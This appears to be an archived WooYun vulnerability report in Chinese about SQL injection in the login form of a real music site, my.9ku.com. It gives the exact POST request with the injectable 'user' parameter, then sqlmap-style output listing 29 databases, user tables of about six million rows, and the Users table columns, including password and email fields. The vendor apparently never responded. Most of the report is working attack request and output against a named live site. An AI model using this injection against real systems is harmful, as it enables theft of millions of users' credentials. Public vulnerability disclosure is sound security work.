乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-02: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-01-16: 厂商已经主动忽略漏洞,细节向公众公开
http://my.9ku.com/love/ifr_login.asp
POST /love/ifr_login.asp HTTP/1.1Host: my.9ku.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://my.9ku.com/love/ifr_login.aspCookie: ASPSESSIONIDQQRDDTCS=NKJANMLDMNOMKELEILPKHGKIConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 33user=admin&pwd=admin&act=login&u=
user存在注入
available databases [29]:[*] 51weimo[*] cc123[*] cheguanjia[*] jkalbumrating[*] jkartist[*] jkdiyalbum[*] jkfans[*] jkfavorite[*] jkfm[*] jkmmpic[*] jkmusichistory[*] jkmyup[*] jkpinglun[*] jkrecommend[*] jkselfzj[*] jksms[*] jksongrating[*] jktag[*] jkusers[*] jkvisitor[*] master[*] meinvpic[*] model[*] msdb[*] OpenMusic
Database: jkusers+---------------------+---------+| Table | Entries |+---------------------+---------+| dbo.Users | 5968982 || dbo.View_dates | 5940632 || dbo.view_users | 5940632 || dbo.userEmail | 2281345 || dbo.tempLogin | 253 || dbo.findpass | 80 || dbo.SongsCount | 18 || dbo.gcGongXianTop10 | 10 || dbo.T_Config | 4 || dbo.EmailTemplate | 2 |+---------------------+---------+Database: jkusersTable: Users[18 columns]+--------------+----------+| Column | Type |+--------------+----------+| BirthDay | datetime || City | nvarchar || EMail | nvarchar || email2 | nvarchar || fm_tg | int || fm_ty | int || fm_xh | int || IsLock | tinyint || lrccount | int || masterphoto | nvarchar || point1_level | int || point2_level | int || Province | nvarchar || RID | int || RName | nvarchar || RPwd | nvarchar || rthistime | datetime || txtcount | int |+--------------+----------+
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)